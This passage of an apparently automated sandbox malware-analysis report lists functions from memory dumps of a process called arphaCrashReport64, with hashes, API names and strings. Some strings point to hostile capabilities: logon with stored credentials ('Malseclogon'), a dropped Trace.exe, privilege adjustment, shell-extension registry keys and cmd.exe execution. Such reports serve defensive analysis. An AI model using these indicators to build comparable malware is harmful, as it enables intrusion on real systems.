                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Pointer$AddressDecodeProc$Encode$LibraryLoad
                                            • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                            • API String ID: 3085332118-232180764
                                            • Opcode ID: 2c0770848c1799fc429614f4a9ab7da04b81b829d8d9f9703341eeec2a353d15
                                            • Instruction ID: bcee7b9c3e38cc13d607d0f20baa4afd17df81755210feb331817b50103fc58e
                                            • Opcode Fuzzy Hash: 2c0770848c1799fc429614f4a9ab7da04b81b829d8d9f9703341eeec2a353d15
                                            • Instruction Fuzzy Hash: 3851FA25B2B70740EF64EB36B4709B42390AFC5B80F488036D92D177FAEE7CE4458A90
                                            Function 0000024B64582DB0 Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 91libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: AddressLibraryProc$Load$Free$CloseHandle
                                            • String ID: ADVAPI32.dll$AdjustTokenPrivileges$GetCurrentProcess$GetLastError$KERNEL32.dll$LookupPrivilegeValueA$OpenProcessToken$SeShutdownPrivilege$kernel32.dll
                                            • API String ID: 2887716753-2040270271
                                            • Opcode ID: 1931c1dd66fb4f11e5269d907c7bd64e2e974d974d3bc15fafe02a502647d804
                                            • Instruction ID: f5011f9dc1ecdd7b49e9c7f08e04d6b7c42a0eb0e9b2205123b10d7312a5e8eb
                                            • Opcode Fuzzy Hash: 1931c1dd66fb4f11e5269d907c7bd64e2e974d974d3bc15fafe02a502647d804
                                            • Instruction Fuzzy Hash: 23317C25611F8995EB42EB25FC5829973AAF788B80F461017EE4A47728DF78C489C748
                                            Function 0000024B64583A90 Relevance: 34.7, APIs: 23, Instructions: 171sleepsynchronizationthreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Count64EventTick$CloseHandleSleep$CancelCreateObjectResetSingleStartupTerminateThreadTimeWaitclosesocketsetsockoptsockettime
                                            • String ID:
                                            • API String ID: 2857159816-0
                                            • Opcode ID: d9f2ec0d3e0aa7c58bdcbaaae274798825103d0bf1e999a975acfbe6aba94234
                                            • Instruction ID: 88eeb93d444ff8e96d5c5ea6165d0a8267dffa19b97ed76bfe130d80fc1192ae
                                            • Opcode Fuzzy Hash: d9f2ec0d3e0aa7c58bdcbaaae274798825103d0bf1e999a975acfbe6aba94234
                                            • Instruction Fuzzy Hash: 43816036600E809AEB22DF25DC5C29D336AFB847A5F164212EA5E43BADDF35C589C305
                                            Function 0000024B645A1BD0 Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 334COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _getptd$BlockUnwind$std::exception::exception$BaseEntryExceptionFunctionImageLookupRaiseThrowtype_info::operator==
                                            • String ID: bad exception$csm$csm$csm
                                            • API String ID: 1639654010-820278400
                                            • Opcode ID: b0da779e959dd11a921ddf9fc6ba28667f0c5ca04c162c67c142df2107bdb14a
                                            • Instruction ID: 6b28803b5bae865c95b30aa40b45347d55e895ee2f7b6ee8fb4aed361fdf7177
                                            • Opcode Fuzzy Hash: b0da779e959dd11a921ddf9fc6ba28667f0c5ca04c162c67c142df2107bdb14a
                                            • Instruction Fuzzy Hash: 57E1E636600E808AEB66DF6191483ED3BAEF745B88F464117EF4917B8ECB34C499C708
                                            Function 0000024B642B1588 Relevance: 30.2, APIs: 14, Strings: 3, Instructions: 493COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _getptd$BlockUnwind$std::exception::exception$BaseImageThrowtype_info::operator==
                                            • String ID: csm$csm$csm
                                            • API String ID: 3798665358-393685449
                                            • Opcode ID: 3059d18893a6f2d6e099a0d3dd07f7d6103baa939f11c7274faf6686222187fe
                                            • Instruction ID: bdcb34b357efa61631f3a990da184e9b84151bbe004899bb0bdec6c7ed41f354
                                            • Opcode Fuzzy Hash: 3059d18893a6f2d6e099a0d3dd07f7d6103baa939f11c7274faf6686222187fe
                                            • Instruction Fuzzy Hash: E9F1FA30634E088BEF5AAF6884497F877D4FB54344F25016DE845D329EDBB0D885CB8A
                                            Function 0000024B645817D0 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 112libraryloaderstringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: AddressProc$Library$FreeLoadlstrlen
                                            • String ID: ?$ADVAPI32.dll$RegCloseKey$RegCreateKeyExA$RegDeleteKeyA$RegDeleteValueA$RegOpenKeyExA$RegSetValueExA
                                            • API String ID: 320228506-381397426
                                            • Opcode ID: 14014c8cb4e149271cbad4aafa1c0eef43e85b9e77fdb354fec79f0d9413f6f3
                                            • Instruction ID: 0bca5705862be87e43b19570886dfd0e8263aad6a349c7e117ec92c5c2153d81
                                            • Opcode Fuzzy Hash: 14014c8cb4e149271cbad4aafa1c0eef43e85b9e77fdb354fec79f0d9413f6f3
                                            • Instruction Fuzzy Hash: C5419036304F9586EB619B16F85875AB7AAF784BD0F411122EE9D43B6CDF38C189C708
                                            Function 0000024B64582BA0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 86libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: AddressProc$Library$FreeLoad
                                            • String ID: CloseDesktop$GetCurrentThreadId$GetThreadDesktop$GetUserObjectInformationA$SetThreadDesktop$kernel32.dll$user32.dll
                                            • API String ID: 2449869053-588083535
                                            • Opcode ID: d557bd2b9d25df6d8a29b5deac8a03b5bc3a892c2579fa6b7429a775bd7d3774
                                            • Instruction ID: 495d3f8829bb2f47c7e1edd5440eb973665b3859414e882d4f8e6786b3f1f1cf
                                            • Opcode Fuzzy Hash: d557bd2b9d25df6d8a29b5deac8a03b5bc3a892c2579fa6b7429a775bd7d3774
                                            • Instruction Fuzzy Hash: 54317C35315F8495EA52DB22FC583AA63AAFB89FC0F421123EE4A47718DF78C489C344
                                            Function 00007FFDFB8B85C4 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 337COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _getptd$BlockUnwind$BaseEntryExceptionFunctionImageLookupRaiseThrow
                                            • String ID: bad exception$csm$csm$csm
                                            • API String ID: 2351602029-820278400
                                            • Opcode ID: 02b85cf1756e5e065ab7d413611b66ecb01733af1b654f7ee524ac275377b04b
                                            • Instruction ID: bd645b0f497b678ae32fd54bbc92f332a9f0dd21715058430d237e63cf950b63
                                            • Opcode Fuzzy Hash: 02b85cf1756e5e065ab7d413611b66ecb01733af1b654f7ee524ac275377b04b
                                            • Instruction Fuzzy Hash: 4EE19731B2A68386DB709B359460AB96794FB84784F448135DAAD07BEECF3CE451CF81
                                            Function 0000024B6459DAB8 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 192processsynchronizationCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: CloseHandleProcess__doserrno_errno$CodeCreateErrorExitLastObjectSingleWait_invalid_parameter_noinfofree
                                            • String ID: cmd.exe
                                            • API String ID: 2975444996-723907552
                                            • Opcode ID: eef2e16a2f52ab01c99e58510f15d6f11bbd98a0e69ced5dc9547102376d560c
                                            • Instruction ID: 29d074d09925f1135250c8ad65fe8ec857c62481f9077f80e3eef1857653726c
                                            • Opcode Fuzzy Hash: eef2e16a2f52ab01c99e58510f15d6f11bbd98a0e69ced5dc9547102376d560c
                                            • Instruction Fuzzy Hash: 8F71EC32700F8495FB628F69E4883AD37AAF754798F568216DF5A077D9DB38C849C308
                                            Function 0000024B6458F360 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 73memoryprocessthreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual$CurrentProcess$CloseCreateHandleLogonThreadWith
                                            • String ID: C:\Users\Public\Music\Trace.exe$MalseclogonDomain$MalseclogonPwd$MalseclogonUser
                                            • API String ID: 1105788500-813928492
                                            • Opcode ID: c90b5ac492fb6ba54225fb440e7324f5a31df96525c86f0d5aa9d662399655ad
                                            • Instruction ID: d71ec006d9fa67ac5edd1313b35a099ae1f0d161c588424f9866d8972a86ce36
                                            • Opcode Fuzzy Hash: c90b5ac492fb6ba54225fb440e7324f5a31df96525c86f0d5aa9d662399655ad
                                            • Instruction Fuzzy Hash: 0031FD32214F86ABDB22CF11F848B9A77B9F784744F410116DB8943A28DF39D5ADCB44
                                            Function 0000024B64596228 Relevance: 19.6, APIs: 13, Instructions: 90COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: free$ErrorFreeHeapLast__free_lconv_mon__free_lconv_num_errno
                                            • String ID:
                                            • API String ID: 518839503-0
                                            • Opcode ID: f930c58ff9535cf105c5e13d2fa07782c103dc284568ccd9d6e8d3d03fe5b7fa
                                            • Instruction ID: d0a108c53b4f28fac019b85f614ab0c0fe2dcc4c9730b5d316e75ee6a60f90d3
                                            • Opcode Fuzzy Hash: f930c58ff9535cf105c5e13d2fa07782c103dc284568ccd9d6e8d3d03fe5b7fa
                                            • Instruction Fuzzy Hash: 7D413232601FC4D4FF579F61C4693AC236AEB85B84F4A1431DB0D5B699CF68C985C358
                                            Function 0000024B6458F690 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registrystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: lstrlen$TimeValue_getptd$CloseFileOpenSystemrand
                                            • String ID: SOFTWARE\Classes\*\shellex$lpData$lpKey
                                            • API String ID: 2327618628-1449424764
                                            • Opcode ID: f65514e6a1795be2495dcb298276d1a54e49bdf145fa4caf51bfb2030b4dae68
                                            • Instruction ID: d85e94f469f975eba49d45517edaef49378df61453d93844720db8f888d6d555
                                            • Opcode Fuzzy Hash: f65514e6a1795be2495dcb298276d1a54e49bdf145fa4caf51bfb2030b4dae68
                                            • Instruction Fuzzy Hash: CE51C232615AC086EB11CF25F45439A77AAF789B84F465022EB8A47B69DF38C545CB08
                                            Function 00007FFDFB8B7DA4 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 95COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _getptd$CreateFrameInfo
                                            • String ID: csm
                                            • API String ID: 4181383844-1018135373
                                            • Opcode ID: 828165de7ce521160259d7b828e9e3e446d8f03bfe6e5b9f43c69d9dafcd3fb8
                                            • Instruction ID: 2a1fe9fb1f7a2d53a8696859648e1acecd0e65a932a4e153e56820a6ed9d612d
                                            • Opcode Fuzzy Hash: 828165de7ce521160259d7b828e9e3e446d8f03bfe6e5b9f43c69d9dafcd3fb8
                                            • Instruction Fuzzy Hash: 27412B36619B8381DB60DF21E460BAD67A8FBC4790F459135DA6D07BAADF38D050CB44
                                            Function 00007FFDFB8B2A68 Relevance: 18.1, APIs: 12, Instructions: 82COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: free$_lock$ErrorFreeHeapLast_errno
                                            • String ID:
                                            • API String ID: 1575098132-0
                                            • Opcode ID: f4b0929f930cd75da52ad39bfe6af33c9704602c3319d20d8591ae602fc7bda3
                                            • Instruction ID: 53b03bdcaeefc1d62564038eb12c07df1e4ed17beaa485d7589721b64c5ab46d
                                            • Opcode Fuzzy Hash: f4b0929f930cd75da52ad39bfe6af33c9704602c3319d20d8591ae602fc7bda3
                                            • Instruction Fuzzy Hash: 6E31D812B3B50384FF68BFB19071FB82651AFC5B84F589535D92E0B6EECE1CA4408B91
                                            Function 0000024B642B0DC4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 150COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _getptd$CreateFrameInfo
                                            • String ID: csm
                                            • API String ID: 4181383844-1018135373
                                            • Opcode ID: e4da1030930dd4cd1c6f41b80cadd6d82696cf0c5265258ebbf79b655e0db643
                                            • Instruction ID: 8415860a80a55edcf628bdc5214a360403f1e0006f293e5092b32c1ece3b180c
                                            • Opcode Fuzzy Hash: e4da1030930dd4cd1c6f41b80cadd6d82696cf0c5265258ebbf79b655e0db643
                                            • Instruction Fuzzy Hash: CD518370528F048FEBA5EF189449BB5B3E4FB99310F21056EE48DC355ADB70E8458B86
                                            Function 0000024B645A140C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 93COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _getptd$CreateFrameInfo_amsg_exit
                                            • String ID: csm
                                            • API String ID: 2825728721-1018135373
                                            • Opcode ID: e4da1030930dd4cd1c6f41b80cadd6d82696cf0c5265258ebbf79b655e0db643
                                            • Instruction ID: ea81c671780a24bbf8f34526bc1e7f35fd93f6e3a2212390cd63d89eeacc274d
                                            • Opcode Fuzzy Hash: e4da1030930dd4cd1c6f41b80cadd6d82696cf0c5265258ebbf79b655e0db643
                                            • Instruction Fuzzy Hash: 74417E36104F8582E671DF12E4443AE77A9F34AB94F164226DFAE07B89DF34C4A9C704
                                            Function 0000024B6459F5D8 Relevance: 16.8, APIs: 11, Instructions: 254COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: free$_errno$EnvironmentVariable__wtomb_environ_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 101574016-0
                                            • Opcode ID: 9f74c31bce3b63dfa0273ca7665c20f16d972669c75fd0b1559b746445878fd9
                                            • Instruction ID: 39c6381ac36075bc39c0e6779ad6e20368305db68cb60f22beb6af324a260fc9
                                            • Opcode Fuzzy Hash: 9f74c31bce3b63dfa0273ca7665c20f16d972669c75fd0b1559b746445878fd9
                                            • Instruction Fuzzy Hash: A5A1B227302FC081FA57AB25A908369669FBB44BD8F1A8529EF59477DDEF38C451C308
                                            Function 0000024B64581AC0 Relevance: 16.6, APIs: 11, Instructions: 75sleepnetworkCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: FreeVirtual$CloseHandle$CleanupSleep
                                            • String ID:
                                            • API String ID: 21600312-0
                                            • Opcode ID: a304c84f429aa0dd12295d70942336703db784592340804cb05594c0d335fd55
                                            • Instruction ID: 84aec26b7cb0bd9995e7fbc588d5a9c9542b03269d2fb71ad0d2be6d9c5d6d51
                                            • Opcode Fuzzy Hash: a304c84f429aa0dd12295d70942336703db784592340804cb05594c0d335fd55
                                            • Instruction Fuzzy Hash: BD314D35302F5086EB9ACF62D85832877AAFF84F85F059116CE5A42A6CDF38C4988305
                                            Function 0000024B64292F18 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 276COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _errno$__getgmtimebuf_invalid_parameter_noinfo_localtime64
                                            • String ID: .dll$2$2$Adva$GetU$ameA$pi32$serN
                                            • API String ID: 1626460918-1620219524
                                            • Opcode ID: b48aaf5986291119d3ad09e467f6c811ae23191144642e74e6dd10f8516cbbca
                                            • Instruction ID: 19da00097f23b26204fca1c2d22f5ac23f4611a4e6b8c5db8b25c0495a86ce0b
                                            • Opcode Fuzzy Hash: b48aaf5986291119d3ad09e467f6c811ae23191144642e74e6dd10f8516cbbca
                                            • Instruction Fuzzy Hash: 5BA1F630124A4C8BEB26EF24D8487EA77E5FB54310F61461AE84AC71E6DF34DA45CB45
                                            Function 0000024B64582CF0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 46libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: AddressProc$Library$FreeLoad
                                            • String ID: CloseDesktop$OpenDesktopA$OpenInputDesktop$user32.dll
                                            • API String ID: 2449869053-3711086354
                                            • Opcode ID: 510d16b2c1c99bb46a5f25ad315769a2d06fe4b01968ba76cc41fb940420ab36
                                            • Instruction ID: 6c26239129bf4fc300a72cf0e22b086a1cc59581725118d205e1d3998a7d202a
                                            • Opcode Fuzzy Hash: 510d16b2c1c99bb46a5f25ad315769a2d06fe4b01968ba76cc41fb940420ab36
                                            • Instruction Fuzzy Hash: 90118620716F5595EA06DB16A858359679AFB88FC0F051026EE4A03B5CDF3CC58A8348
                                            Function 0000024B6459C5D0 Relevance: 15.3, APIs: 10, Instructions: 253COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: free$ErrorInfoLast
                                            • String ID:
                                            • API String ID: 189849726-0
                                            • Opcode ID: ed597548c62d6f293f89439e5fe85e9590073bf69dc433b741745838140ad289
                                            • Instruction ID: ab93532dc9f8b3c14b86e90ae935714e79597be386b886c1d742167de3b4da23
                                            • Opcode Fuzzy Hash: ed597548c62d6f293f89439e5fe85e9590073bf69dc433b741745838140ad289
                                            • Instruction Fuzzy Hash: 88B1F332304BC096E717CF25E0583AE77AAF749B84F86412AEB8987799DF38C541C704
                                            Function 0000024B6459F104 Relevance: 15.2, APIs: 10, Instructions: 250COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000024B6459F4AE), ref: 0000024B6459F1F7
                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000024B6459F4AE), ref: 0000024B6459F276
                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000024B6459F4AE), ref: 0000024B6459F31D
                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000024B6459F4AE), ref: 0000024B6459F343
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$Info
                                            • String ID:
                                            • API String ID: 1775632426-0
                                            • Opcode ID: 1842b7b9aeb76f450a757d8ddac4bd04b4d2bf37fa62d8c5c4ecf23dbc8fb625
                                            • Instruction ID: 5942cfaea4e0ad95e989f4acc1114d7ae0bdd63d6fd385b82ae77fc79685603f
                                            • Opcode Fuzzy Hash: 1842b7b9aeb76f450a757d8ddac4bd04b4d2bf37fa62d8c5c4ecf23dbc8fb625
                                            • Instruction Fuzzy Hash: F9A1B063704EC096EB268F25D8083AD2B9BF7417A8F5A4616FB69477CDDB38C944C348
                                            Function 0000024B6459A690 Relevance: 15.2, APIs: 10, Instructions: 206COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
